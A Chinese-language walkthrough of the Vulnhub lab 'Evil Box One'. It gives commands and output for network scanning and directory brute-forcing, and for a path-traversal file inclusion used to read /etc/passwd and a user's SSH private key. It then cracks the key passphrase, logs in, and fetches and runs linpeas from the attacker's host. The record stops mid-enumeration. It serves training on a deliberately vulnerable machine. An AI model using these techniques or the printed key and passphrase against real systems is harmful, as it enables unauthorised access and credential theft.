Vulnhub Evil Box One靶机解题过程
Evil Box One
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:0b:79:0e 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.151 08:00:27:42:21:ce 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.151
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.151 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-05 07:20 EDT
Nmap scan report for bogon (192.168.56.151)
Host is up (0.000059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:42:21:CE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds
Get Access
Kali Linux利用浏览器访问目标主机的80端口,返回Apache的默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/robots.txt
Hello H4x0r
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ nikto -h http://192.168.56.151
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.151
+ Target Hostname: 192.168.56.151
+ Target Port: 80
+ Start Time: 2022-11-05 07:23:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-11-05 07:24:34 (GMT-4) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
Nikto发现了/secret/目录
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ gobuster dir -u http://192.168.56.151 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.151
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/05 07:25:42 Starting gobuster in directory enumeration mode
===============================================================
/secret (Status: 301) [Size: 317] [--> http://192.168.56.151/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 205002 / 207644 (98.73%)===============================================================
2022/11/05 07:26:06 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ dirb http://192.168.56.151
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 5 07:26:17 2022
URL_BASE: http://192.168.56.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.151/ ----
+ http://192.168.56.151/index.html (CODE:200|SIZE:10701)
+ http://192.168.56.151/robots.txt (CODE:200|SIZE:12)
==> DIRECTORY: http://192.168.56.151/secret/
+ http://192.168.56.151/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.151/secret/ ----
+ http://192.168.56.151/secret/index.html (CODE:200|SIZE:4)
-----------------
END_TIME: Sat Nov 5 07:26:20 2022
DOWNLOADED: 9224 - FOUND: 4
访问/secret/目录,没有返回任何内容
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/
看一下这个目录下有没有什么文件:
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ gobuster dir -u http://192.168.56.151/secret/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.151/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: html,php,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/05 07:27:54 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/.html (Status: 403) [Size: 279]
/evil.php (Status: 200) [Size: 0]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 1036244 / 1038220 (99.81%)===============================================================
2022/11/05 07:30:02 Finished
===============================================================
在/secret/目录下发现了evil.php文件
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/evil.php
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$
访问该文件,返回仍然是空,接下来需要枚举参数。
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ wfuzz -c -u http://192.168.56.151/secret/evil.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.151/secret/evil.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001163: 200 26 L 38 W 1398 Ch "command"
Total time: 2.793259
Processed Requests: 4713
Filtered Requests: 4712
Requests/sec.: 1687.276
现在已经FUZZ出来参数名称为command。 可以手动确认一下
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/evil.php?command=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
看到用户名称为mowree,试一下是否可以执行命令好像不行,只是有本地文件包含,用同样的方法是否存在文件/home/mowree/.ssh/id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/evil.php?command=../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1743 100 1743 0 0 455k 0 --:--:-- --:--:-- --:--:-- 567k
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ls
id_rsa nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$
利用得到的私钥登录目标主机:
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ssh -i id_rsa mowree@192.168.56.151
The authenticity of host '192.168.56.151 (192.168.56.151)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.151' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
该私钥被口令保护,需要破解:
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ john hashes /usr/share/wordlists/rockyou.txt
Warning: only loading hashes of type "SSH", but also saw type "tripcode"
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
unicorn (id_rsa)
1g 0:00:00:00 DONE 2/3 (2022-11-05 07:45) 12.50g/s 159175p/s 159175c/s 159175C/s surfer..unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
成功破解了口令: unicorn
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ssh -i id_rsa mowree@192.168.56.151
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
提权
将linpeas.sh脚本上传至目标主机的/tmp目录下,并修改权限:
mowree@EvilBoxOne:~$ cd /tmp
mowree@EvilBoxOne:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
--2022-11-05 12:50:27-- http://192.168.56.137:8000/linpeas.sh
Conectando con 192.168.56.137:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 827827 (808K) [text/x-sh]
Grabando a: “linpeas.sh”
linpeas.sh 100%[================>] 808,42K --.-KB/s en 0,004s
2022-11-05 12:50:27 (205 MB/s) - “linpeas.sh” guardado [827827/827827]
mowree@EvilBoxOne:/tmp$ ls
linpeas.sh
systemd-private-c6630f91b987414f87c9ea06b994a7ad-apache2.service-OIZiOj
systemd-private-c6630f91b987414f87c9ea06b994a7ad-systemd-timesyncd.service-3sxhUM
mowree@EvilBoxOne:/tmp$ chmod +x linpeas.sh
mowree@EvilBoxOne:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
╔══════════╣ Do I have PGP keys?
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.38 (Debian)
Server built: 2021-06-10T10:13:06
httpd Not Found
Nginx version: nginx Not Found
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 427K ene 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 50K jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 51K ene 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 35K ene 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 53K jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 83K jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K ene 10 2019 /usr/bin/su
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 39K feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 15K may 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 19K dic 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71K jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31K jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K ene 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 315K ene 31 2020 /usr/bin/ssh-agent
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/mowree/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/robots.txt
/var/www/html/index.html
/var/www/html/secret
/var/www/html/secret/index.html
/var/www/html/secret/evil.php
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service
/sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/daemon.log
/var/log/syslog
/var/log/wtmp
/var/log/lastlog
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/mowree (limit 20)
total 32
drwxr-xr-x 4 mowree mowree 4096 ago 16 2021 .
drwxr-xr-x 3 root root 4096 ago 16 2021 ..
lrwxrwxrwx 1 root root 9 ago 16 2021 .bash_history -> /dev/null
-rwxr-xr-x 1 mowree mowree 220 ago 16 2021 .bash_logout
-rwxr-xr-x 1 mowree mowree 3526 ago 16 2021 .bashrc
drwxr-xr-x 3 mowree mowree 4096 ago 16 2021 .local
-rwxr-xr-x 1 mowree mowree 807 ago 16 2021 .profile
drwxr-xr-x 2 mowree mowree 4096 ago 16 2021 .ssh
-r-------- 1 mowree mowree 31 ago 16 2021 user.txt
╔══════════╣ Files inside others home (limit 20)
/var/www/html/robots.txt
/var/www/html/index.html
/var/www/html/secret/index.html
/var/www/html/secret/evil.php
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7867 jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 303 oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 363752 abr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 9731 jul 18 2021 /usr/lib/modules/4.19.0-17-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9716 ene 30 2021 /usr/lib/modules/4.19.0-14-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4,0K ago 16 2021 .
drwxr-xr-x 12 root root 4,0K ago 16 2021 ..
drwxr-xr-x 3 root root 4,0K ago 16 2021 html
/var/www/html:
total 28K
drwxr-xr-x 3 root root 4,0K ago 16 2021 .
drwxr-xr-x 3 root root 4,0K ago 16 2021 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 nov 5 11:53 /run/network/.ifstate.lock
-rwxr-xr-x 1 mowree mowree 220 ago 16 2021 /home/mowree/.bash_logout
-rw-r--r-- 1 root root 220 abr 18 2019 /etc/skel/.bash_logout
-rw------- 1 root root 0 ago 16 2021 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 22 mar 21 2019 /usr/share/debian-reference/.htaccess
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 mowree mowree 827827 nov 5 12:50 /tmp/linpeas.sh
-rw-r--r-- 1 root root 9359 ago 16 2021 /var/backups/apt.extended_states.0
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/passwd
/home/mowree
/run/lock
/run/user/1000
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory
/var/lib/php/sessions
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
